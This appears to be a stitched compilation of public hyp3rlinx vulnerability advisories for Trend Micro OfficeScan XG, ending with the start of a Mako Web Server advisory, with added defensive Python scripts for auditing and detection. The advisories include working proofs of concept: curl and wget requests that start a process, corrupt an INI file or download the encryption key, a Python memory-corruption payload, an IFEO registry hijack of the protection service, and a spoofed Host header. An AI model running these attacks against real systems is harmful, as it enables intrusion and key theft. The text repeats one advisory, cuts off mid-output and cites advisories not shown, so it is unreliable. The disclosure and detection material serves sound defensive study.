Vendor reply: "We confirmed that this is a valid vulnerability. We are now working on a hotfix to remediate the issue." : June 30, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
Trend Micro OfficeScan v11.0 and XG (12.0)* CURL (MITM) Remote Code Execution CVE-2017-14084 (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.trendmicro.com

Product:
===============
OfficeScan v11.0 and XG (12.0)*

Vulnerability Type:
===============
Man-in-the-Middle (MITM) Remote Code Execution

CVE Reference:
===============
CVE-2017-14084

Security Issue:
===============
A MITM vector exists as the CURL request used by the Send() function in "HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST set to false. CURLOPT_SSL_VERIFYPEER checks that the remote certificate is valid, was issued by a CA you trust and is genuine. CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity you want to talk to...

References:
===============
https://success.trendmicro.com/solution/1118372

Vulnerable code snippet...
curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);   <=== HERE
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);   <=== THERE

Network Access:
===============
Remote

Severity:
===============
High

Disclosure Timeline:
===============
Vendor Notification: May 31, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
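As an added example (it is not Trend Micro's code and not part of the advisory), the following Python script audits PHP source for curl_setopt() calls that weaken TLS verification, the misconfiguration behind this MITM issue. It runs over a constructed sample modelled on the snippet above and over a hardened version; the hardened snippet, its $ch handle name and the CA bundle path are assumptions for the example.

```python
import re

# Constructed PHP sample, modelled on the vulnerable HttpTalk.php snippet quoted in
# the advisory (it is not Trend Micro's file): both verification options are off.
VULNERABLE_PHP = """\
curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);
"""

# The hardened form (assumed, not vendor code): peer verification on, host
# verification at level 2 (the only value that matches the certificate name
# against the requested host), and an explicit CA bundle (assumed path).
HARDENED_PHP = """\
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_CAINFO, '/etc/ssl/certs/ca-certificates.crt');
"""

# Matches curl_setopt($handle, CURLOPT_SSL_VERIFY{PEER,HOST}, <value>) on one line.
SETOPT_RE = re.compile(
    r"curl_setopt\s*\(\s*[^,]+,\s*(CURLOPT_SSL_VERIFYPEER|CURLOPT_SSL_VERIFYHOST)\s*,\s*([^)]+?)\s*\)",
    re.IGNORECASE,
)

# PHP values that switch CURLOPT_SSL_VERIFYPEER off.
FALSEY = {"0", "false", "null", "''", '""'}


def find_insecure_curl_options(php_source):
    """Return (line_no, option, value, reason) for every curl_setopt call that
    weakens TLS verification. Line numbers are 1-based within php_source."""
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        for option, value in SETOPT_RE.findall(line):
            option = option.upper()
            value = value.strip()
            if option == "CURLOPT_SSL_VERIFYPEER" and value.lower() in FALSEY:
                findings.append((line_no, option, value,
                                 "peer certificate not validated against a CA: any certificate is accepted"))
            elif option == "CURLOPT_SSL_VERIFYHOST" and value != "2":
                # 0 disables the name check entirely; 1 (PHP's true) only checks that a CN
                # exists and is rejected outright by libcurl >= 7.28.1.
                findings.append((line_no, option, value,
                                 "certificate name not matched against the requested host"))
    return findings


def is_tls_verification_intact(php_source):
    """True when no curl_setopt call in the source disables peer or host verification."""
    return not find_insecure_curl_options(php_source)


if __name__ == "__main__":
    for line_no, option, value, reason in find_insecure_curl_options(VULNERABLE_PHP):
        print("line %d: %s = %s -> %s" % (line_no, option, value, reason))
    print("hardened snippet clean:", is_tls_verification_intact(HARDENED_PHP))
```

Run the script as-is to see both findings against the vulnerable sample and a clean result for the hardened one; point find_insecure_curl_options() at the contents of any PHP file to audit it. The check is line-based, so a curl_setopt call split across lines will be missed; for a code base that formats calls that way, feed it the file with newlines collapsed first.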
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Start Remote Process Code Execution / DOS - INI Corruption CVE-2017-14086 (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.trendmicro.com

Product:
===============
OfficeScan XG v11.0 and (12.0)*

Vulnerability Type:
===============
Unauthorized Start Remote Process Code Execution
Unauthorized Denial Of Service - INI Corruption

CVE Reference:
===============
CVE-2017-14086

Security Issue:
===============
Remote unauthenticated attackers who connect to the OfficeScan XG application can temporarily start the "fcgiOfcDDA.exe" executable. The process runs for a short time before it dies; server disk space may also be consumed with dump files by making continuous HTTP requests.

References:
===============
https://success.trendmicro.com/solution/1118372

Exploit/POC Start Remote Process Code Execution:
===============
c:\> curl -k https://VICTIM-IP:4343/officescan/console/CGI/

HTTP response:
403 - Forbidden: Access is denied.
You do not have permission to view this directory or page using the credentials that you supplied

But, we can access it directly :)

c:\> curl -v -k https://VICTIM-IP:4343/officescan/console/CGI/fcgiOfcDDA.exe

HTTP Response:
500 - Internal server error.
There is a problem with the resource you are looking for, and it cannot be displayed.

The EXE is called, then runs for a short time before a .DMP is generated.

fcgiOfcDDA.exe.6808.dmp

The stored exception information can be accessed via .ecxr.
(568.112c): Unknown exception - code c00d (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll -
eax= ebx=0014f780 ecx= edx= esi=0002 edi=
eip=77d9016d esp=0014f730 ebp=0014f7cc iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!NtWaitForMultipleObjects+0x15:

Exploit/POC (Denial Of Service / INI Corruption):
===============
[root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/CGI/cgiRqUpd.exe
* About to connect() to VICTIM-IP port 4343
* Trying VICTIM-IP.. connected
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Encryption Key Disclosure CVE-2017-14083 (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.trendmicro.com

Product:
===============
OfficeScan v11.0 and XG (12.0)*

Vulnerability Type:
===============
Unauthorized Encryption Key Disclosure

CVE Reference:
===============
CVE-2017-14083

Security Issue:
===============
Remote unauthenticated attackers who can reach the TrendMicro OfficeScan XG application, which usually runs on port 4343, can download the OfficeScan XG encryption "crypt.key" file. This crypt.key is used for the OfficeScan XG encryption process.

References:
===============
https://success.trendmicro.com/solution/1118372

e.g. In "config.php"

/*
 * Encryption module configurations
 */
$wfconf_wfcrypt_keyfile = dirname(__FILE__) . "/../repository/inc/class/common/crypt/crypt.key";   <= HERE
$wfconf_wfcrypt_algorithm = MCRYPT_RIJNDAEL_256; // MCRYPT_3DES MCRYPT_BLOWFISH MCRYPT_CAST_256 MCRYPT_DES ...

/*
 * Framework configurations
 */

Exploit/POC:
===============
[root@localhost /]# wget --no-check-certificate https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
--14:59:52-- https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
Connecting to VICTIM-IP:4343... connected.
WARNING: cannot verify VICTIM-IP's certificate, issued by `/CN=VICTIM-IP':
Self-signed certificate encountered.
HTTP request sent, awaiting response... 200 OK
Length: 32 [application/octet-stream]
Saving to: `crypt.key'

100%[==>] 32 --.-K/s in 0s

14:59:52 (15.3 MB/s) - `crypt.key' saved [32/32]

Network Access:
===============
Remote

Severity:
===============
High

Disclosure Timeline:
===============
Vendor Notification: May 31, 2017
Vendor: "hotfix in progress". June 23, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Change Prevention Image File Execution Bypass (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.trendmicro.com

Product:
===============
OfficeScan v11.0 and XG (12.0)*

Vulnerability Type:
===============
Image File Execution Bypass

CVE Reference:
===============
N/A

Security Issue:
===============
The OfficeScan XG "Unauthorized Change Prevention Service" is a Local SYSTEM service that is supposed to protect OfficeScan processes like "PccNTMon.exe" from being terminated, and also prevents unauthorized arbitrary registry settings being made to the protected machine, even by an Administrator. However, we can easily bypass it by exploiting Windows Image File Execution Options (IFEO) to hijack the service process. IFEO has been used by malware for some time to prevent a process from running, or to execute a process of an attacker's choosing in place of the process the user expects.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

All an attacker needs to do is create a registry key in IFEO with the same name as "TMBMSRV.exe", which is used by the "Trend Micro Unauthorized Change Prevention Service" SYSTEM service. After creating this registry key we create a "string value" named debugger pointing to, say, "calc.exe"; we wait, and once the system reboots BOOM!
References:
===============
https://success.trendmicro.com/solution/1118372

Exploit/POC:
===============
Reproduction:
1) Open registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
2) Create a new Key with no name
3) Create a new string value under the new key named "debugger" with value of c:\Windows\system32\calc.exe
4) Rename the created key to TMBMSRV.exe
5) Reboot system

Done! We can then not only kill TM but also write to the TrendMicro whitelist key in the registry so our evil binary is left alone in peace.

Network Access:
===============
Local

Severity:
===============
High

Disclosure Timeline:
===============
Vendor Notification: June 28, 2017
Vendor Reply: "Officescan Build 1222 which is affected by this bug was already pulled and is no longer available for public download"
Vendor Reply: "created hotfixes for product improvement."
September 28, 2017 : Public Disclosure
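From the defender's side, the IFEO hijack above leaves a plain artifact in the registry: a "Debugger" value under an Image File Execution Options subkey named after a protected process. As an added example (not Trend Micro's tooling and not from the advisory), the following Python script parses a registry export in the text format that "reg export" writes and rates every IFEO Debugger entry; the export is constructed for the example, TMBMSRV.exe and PccNTMon.exe are the protected process names from the advisory, and the notepad.exe and someapp.exe entries are assumed filler.

```python
import re

# Constructed .reg export (not taken from a real system) in the text format that
# "reg export" produces. One key is a benign IFEO use (GlobalFlag only), one
# reproduces the TMBMSRV.exe hijack described in the advisory, and one is an
# assumed third-party debugger registration that deserves a look but is not
# known to be hostile.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TMBMSRV.exe]
"debugger"="c:\\Windows\\system32\\calc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\someapp.exe]
"Debugger"="\"C:\\Program Files\\Vendor\\dbg.exe\" -p"
'''

IFEO_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Image File Execution Options" + "\\")

# Process names whose IFEO "Debugger" value should never be set on a managed host.
# These two are the protected OfficeScan processes named in the advisory.
PROTECTED_IMAGES = {"tmbmsrv.exe", "pccntmon.exe"}

# "name"=value lines; the name may contain escaped quotes or backslashes.
VALUE_RE = re.compile(r'"((?:[^"\\]|\\.)*)"=(.*)$')


def parse_reg_export(text):
    """Parse a .reg export into {key_path: {value_name: value}}.
    REG_SZ values are unescaped; other types (dword:, hex:) are kept verbatim."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = VALUE_RE.match(line)
            if not m:
                continue
            name, value = m.group(1), m.group(2)
            if len(value) >= 2 and value.startswith('"') and value.endswith('"'):
                value = value[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            keys[current][name] = value
    return keys


def find_ifeo_debugger_hijacks(text, protected=PROTECTED_IMAGES):
    """Return sorted (severity, image_name, debugger_command) tuples for every IFEO
    subkey carrying a Debugger value: HIGH for protected images, REVIEW otherwise."""
    hits = []
    for key, values in parse_reg_export(text).items():
        if not key.lower().startswith(IFEO_PREFIX.lower()):
            continue
        image = key[len(IFEO_PREFIX):]
        for name, value in values.items():
            if name.lower() == "debugger":
                severity = "HIGH" if image.lower() in protected else "REVIEW"
                hits.append((severity, image, value))
    return sorted(hits)


if __name__ == "__main__":
    for severity, image, command in find_ifeo_debugger_hijacks(SAMPLE_REG):
        print("%-6s %s -> %s" % (severity, image, command))
```

To use it on a real host, export the IFEO key with "reg export" (the file is UTF-16; decode it before passing the text in) and extend PROTECTED_IMAGES with the other processes your endpoint agent is meant to protect. Any Debugger value on a protected image is a finding regardless of what it points to, since the service will never start with that value in place.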
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Memory Corruption CVE-2017-14089 (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.trendmicro.com

Product:
===============
OfficeScan v11.0 and XG (12.0)*

Vulnerability Type:
===============
Unauthorized Remote Memory Corruption

CVE Reference:
===============
CVE-2017-14089

Security Issue:
===============
Remote unauthenticated attackers that can connect to the TrendMicro OfficeScan XG application and target the "cgiShowClientAdm.exe" process can cause memory corruption issues.
References:
===============
https://success.trendmicro.com/solution/1118372

Exploit/POC:
===============
import urllib,urllib2
from urllib2 import Request

print 'TrendMicro OfficeScan XG'
print 'Stack Memory Corruption POC'
print 'by hyp3rlinx\n'

IP="VICTIM-IP:4343"
PAYLOAD="A"*256

url = urllib2.Request('https://'+IP+'/officescan/console/html/cgi/cgiShowClientAdm.exe')

cookie="Cookie: serror=0; session_expired=no; FeatureEnableState=enableAntiBody@1|enableCCFR@1|enableCfw@1|enableDcs@1|enableSorting@0|enableSpy@1|enableVirus@1|HasAvAddSvc@1|installWSS@1|enableDLP@0|sqldbMode@0|enableIPv6@1|w2ksupport@0|; stamp=2231521137; timestamp=1497360567; DisabledIds=.; LogonUser=A; ReadOnlyIds=8.56.; enableRba=1; key=16914202097564; session=666; LANG=en_US; PHPSESSID=WHATEVER123; lastID=34; lastTab=-1; theme=default; wf_CSRF_token=; serror=0; retry=0; PHPSESSID=WHATEVERHERE; wf_CSRF_token=666; LANG=en_US; theme=default; lastID=33; lastTab=-1"

print '\nsending packetz... \n'+ cookie

##url.add_header("X-CSRFToken", "ee721b62aef83b017e8c86f52e38a411") #<== X-CSRFToken IS NOT EVEN NEEDED!
url.add_header("Content-Type", "application/x-www-form-urlencoded; charset=utf-8")
url.add_header("Content-Length", "54")
url.add_header("Cookie", cookie)

res = urllib2.urlopen(url)   #send the request once; the response object cannot be opened again
print res

Network Access:
===============
Remote

Severity:
===============
High

Disclosure Timeline:
===============
Vendor Notification: June 5, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
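Several of the OfficeScan advisories above (the NT domain and PHP information disclosures, the help_proxy.php SSRF, the fcgiOfcDDA.exe and cgiRqUpd.exe requests, the crypt.key download and the cgiShowClientAdm.exe memory corruption) share one trait: each is reached by a plain HTTP request to a fixed console path on port 4343, which the IIS front end logs. As an added example (not Trend Micro's code and not from any of the advisories), the following Python script parses IIS W3C access log lines, flags requests to those endpoints and ranks the source addresses; the log excerpt is constructed, and the placeholder console page and client addresses in it are assumptions.

```python
from collections import Counter

# Console paths from the advisories that should not be reachable without an
# authenticated console session, keyed lower-case for matching.
SENSITIVE_PATHS = {
    "/officescan/console/remoteinstallcgi/cgigetntdomain.exe":
        "CVE-2017-14085 NT domain enumeration",
    "/officescan/console/html/widget/repository/widgetpool/wp1/interface/analyzewf.php":
        "CVE-2017-14085 PHP information disclosure",
    "/officescan/console/html/widget/help_proxy.php":
        "SSRF through help_proxy.php",
    "/officescan/console/cgi/fcgiofcdda.exe":
        "CVE-2017-14086 unauthenticated process start",
    "/officescan/cgi/cgirqupd.exe":
        "CVE-2017-14086 denial of service / INI corruption",
    "/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key":
        "CVE-2017-14083 crypt.key disclosure",
    "/officescan/console/html/cgi/cgishowclientadm.exe":
        "CVE-2017-14089 memory corruption",
}

# Constructed IIS W3C log excerpt (not a real capture). The second line is an
# assumed ordinary console page; user-agents carry '+' because IIS replaces spaces.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2017-06-02 15:58:26 10.0.0.5 GET /officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php - 4343 10.0.0.77 curl/7.47.0 200
2017-06-02 15:58:40 10.0.0.5 GET /officescan/console/html/some_console_page.html - 4343 10.0.0.23 Mozilla/5.0+(Windows+NT+6.1) 200
2017-06-02 15:59:02 10.0.0.5 GET /officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe - 4343 10.0.0.77 curl/7.47.0 200
2017-06-02 15:59:10 10.0.0.5 GET /officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key - 4343 10.0.0.77 Wget/1.14 200
2017-06-02 15:59:30 10.0.0.5 GET /officescan/console/CGI/fcgiOfcDDA.exe - 4343 10.0.0.77 curl/7.47.0 500
2017-06-02 16:00:01 10.0.0.5 GET /officescan/console/html/widget/help_proxy.php url=http://10.0.0.9:8080 4343 10.0.0.77 curl/7.47.0 200
"""


def parse_iis_w3c(text):
    """Yield one dict per request line, naming columns from the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # malformed or pre-directive line: skip rather than guess
        yield dict(zip(fields, parts))


def find_sensitive_requests(text):
    """Return one alert dict per request whose URI stem is a known unauthenticated
    OfficeScan endpoint. Status is kept but not filtered on: a 500 from
    fcgiOfcDDA.exe is exactly what the advisory describes."""
    alerts = []
    for rec in parse_iis_w3c(text):
        issue = SENSITIVE_PATHS.get(rec.get("cs-uri-stem", "").lower())
        if issue:
            alerts.append({
                "time": rec.get("date", "") + " " + rec.get("time", ""),
                "client": rec.get("c-ip", "?"),
                "path": rec["cs-uri-stem"],
                "query": rec.get("cs-uri-query", "-"),
                "status": int(rec.get("sc-status", "0")),
                "issue": issue,
            })
    return alerts


def clients_by_alert_count(alerts):
    """Rank source addresses by how many sensitive endpoints they touched."""
    return Counter(a["client"] for a in alerts).most_common()


if __name__ == "__main__":
    found = find_sensitive_requests(SAMPLE_LOG)
    for a in found:
        print("%s %s -> %s [%d] %s" % (a["time"], a["client"], a["path"], a["status"], a["issue"]))
    print(clients_by_alert_count(found))
```

The parser reads the column layout from the #Fields: line, so it works unchanged on logs with extra or reordered columns as long as cs-uri-stem and c-ip are present. One address touching several of these paths within minutes, as in the sample, is the pattern to alert on; a single hit on crypt.key is worth a ticket on its own, since that key does not change between requests.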
CVE-2017-14087 Trend Micro OfficeScan v11.0 and XG (12.0)* Host Header Injection (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt
[+] ISR: ApparitionSec

Vendor:
===============
www.trendmicro.com

Product:
===============
OfficeScan v11.0 and XG (12.0)*

Vulnerability Type:
===============
Host Header Injection

CVE Reference:
===============
CVE-2017-14087

Security Issue:
===============
Host header injection issue, as "db_controller.php" relies on $_SERVER['HTTP_HOST'], which can be spoofed by the client, instead of $_SERVER['SERVER_NAME']. In environments where caching is in place, making an HTTP GET request with a poisoned HOST header can cause web pages to render arbitrary links that point to a malicious website.

Exploit/POC:
===============
c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP"

Network Access:
===============
Remote

Severity:
===============
Medium

Disclosure Timeline:
===============
Vendor Notification: June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
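The fix the advisory points at is to stop trusting the client-supplied Host header when building links. As an added example (not Trend Micro's code and not from the advisory), the following Python shows the pattern in a WSGI-style request handler: the Host header is only used if its hostname is on an allowlist, and otherwise the link is built from the server-configured name, the equivalent of $_SERVER['SERVER_NAME']. The allowed host names, the two constructed environ dicts and the attacker.example address are assumptions for the example.

```python
from urllib.parse import urlsplit

# Names this deployment is actually served under (assumed values for the example).
ALLOWED_HOSTS = {"officescan.example.com", "10.0.0.5"}


class BadHostHeader(ValueError):
    """Raised when the client-supplied Host header is not one of ours."""


def validated_host(environ, allowed_hosts=ALLOWED_HOSTS):
    """Return the raw Host header only if it is a bare host[:port] whose hostname is
    on the allowlist. Host is attacker-controlled, like PHP's $_SERVER['HTTP_HOST']."""
    raw = environ.get("HTTP_HOST", "")
    # urlsplit handles "host:port" and "[ipv6]:port" and lower-cases the hostname.
    parts = urlsplit("//" + raw)
    hostname = parts.hostname or ""
    if parts.netloc != raw or parts.username is not None or hostname not in allowed_hosts:
        raise BadHostHeader("refusing to build links for Host header %r" % raw)
    return raw


def build_absolute_url(environ, path, allowed_hosts=ALLOWED_HOSTS):
    """Build an absolute URL for a page link. A spoofed Host is never echoed back:
    the link falls back to SERVER_NAME/SERVER_PORT, which come from server
    configuration rather than from the request."""
    scheme = environ.get("wsgi.url_scheme", "https")
    try:
        host = validated_host(environ, allowed_hosts)
    except BadHostHeader:
        host = environ["SERVER_NAME"]
        port = environ.get("SERVER_PORT", "")
        if port and port not in ("80", "443"):
            host = "%s:%s" % (host, port)
    return "%s://%s%s" % (scheme, host, path)


# Constructed WSGI environs: a legitimate request and one carrying a poisoned Host.
GOOD_ENVIRON = {"wsgi.url_scheme": "https", "HTTP_HOST": "officescan.example.com:4343",
                "SERVER_NAME": "10.0.0.5", "SERVER_PORT": "4343"}
SPOOFED_ENVIRON = {"wsgi.url_scheme": "https", "HTTP_HOST": "attacker.example:4343",
                   "SERVER_NAME": "10.0.0.5", "SERVER_PORT": "4343"}

if __name__ == "__main__":
    print(build_absolute_url(GOOD_ENVIRON, "/officescan/console/"))
    print(build_absolute_url(SPOOFED_ENVIRON, "/officescan/console/"))
```

Falling back silently is the choice that keeps a cache from ever storing a poisoned link; an application that would rather surface the problem can let BadHostHeader propagate and answer 400. In the PHP case the same effect comes from building links on $_SERVER['SERVER_NAME'], provided the web server's ServerName is set explicitly and UseCanonicalName (or the IIS equivalent binding) is not letting the request fill it in.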
CVE-2017-14084 Trend Micro OfficeScan v11.0 and XG (12.0)* CURL (MITM) Remote Code Execution (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec

Vendor:
==================
www.trendmicro.com

Product:
==================
OfficeScan v11.0 and XG (12.0)*

OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program
that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server,
through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.

Vulnerability Type:
===================
Man-in-the-Middle (MITM) Remote Code Execution

CVE Reference:
==============
CVE-2017-14084

Security Issue:
================
A MITM vector exists because the CURL request used by the Send() function in "HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER
and CURLOPT_SSL_VERIFYHOST set to false. CURLOPT_SSL_VERIFYPEER checks that the remote certificate is valid, was issued by a
CA you trust and is genuine. CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity you want to talk to...

References:
===========
https://success.trendmicro.com/solution/1118372

Vulnerable code snippet...

curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);   <=== HERE
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);   < THERE

Network Access:
===============
Remote

Severity:
=========
High

Disclosure Timeline:
====================
Vendor Notification: May 31, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
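Added example, not Trend Micro's code nor part of the advisory: a small source audit that flags curl_setopt() calls disabling TLS verification, the defect in the snippet above. The two PHP fragments are constructed; the first mirrors the vulnerable HttpTalk.php lines, the second shows the corrected settings (the CA bundle path is a placeholder).

```python
import re

# One curl_setopt(handle, CURLOPT_SSL_VERIFY*, value) call, tolerant of whitespace.
SETOPT_RE = re.compile(
    r"curl_setopt\s*\(\s*[^,]+,\s*(CURLOPT_SSL_VERIFY(?:PEER|HOST))\s*,\s*([^)]+?)\s*\)",
    re.IGNORECASE,
)

# Values that keep verification on; anything else is reported.
SAFE_VALUES = {
    "CURLOPT_SSL_VERIFYPEER": {"true", "1"},
    "CURLOPT_SSL_VERIFYHOST": {"2"},   # 0 disables the check, 1 is deprecated
}


def find_disabled_tls_checks(php_source):
    """Return (line_number, option, value) for each call that weakens TLS checks."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for m in SETOPT_RE.finditer(line):
            option = m.group(1).upper()
            value = m.group(2).strip().lower()
            if value not in SAFE_VALUES[option]:
                findings.append((lineno, option, value))
    return findings


# Constructed PHP mirroring the vulnerable lines quoted in the advisory.
SAMPLE_VULNERABLE = """\
curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);
"""

# Constructed hardened form: verify the peer, verify the host name, pin a CA bundle.
SAMPLE_FIXED = """\
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_CAINFO, '/path/to/ca-bundle.crt');
"""
```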
Mako Web Server v2.5 Multiple Unauthenticated Vulnerabilities (apparitionsec / hyp3rlinx)
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3391
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt
[+] ISR: ApparitionSec

Vulnerabilities Summary
=======================
The following advisory describes three (3) vulnerabilities found in the Mako Server's tutorial page.

The vulnerabilities found are:
Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution
Unauthenticated File Disclosure
Unauthenticated Server Side Request Forgery

As these tutorials may be used as the basis for production code, it is important for users to be aware of these issues.

As a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications.
The Mako Server provides an application server environment from which developers can design and implement complete, custom
solutions. The Mako Web Server is ideal for embedded Linux systems.

Credit
======
An independent security researcher, John Page AKA hyp3rlinx, has reported this vulnerability to Beyond Security's SecuriTeam
Secure Disclosure program.

Vendor response
===============
RealTimeLogic was informed of the vulnerability on Aug 13, but while acknowledging the receipt of the vulnerability
information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory, saying:

"I just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in
place. Internally I need to set-up a cost allocation account for billing against these support inquiries."

At this time it's unclear whether these vulnerabilities are going to be fixed, and further attempts to get a status
clarification failed.

Vulnerabilities details
=======================

Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution:

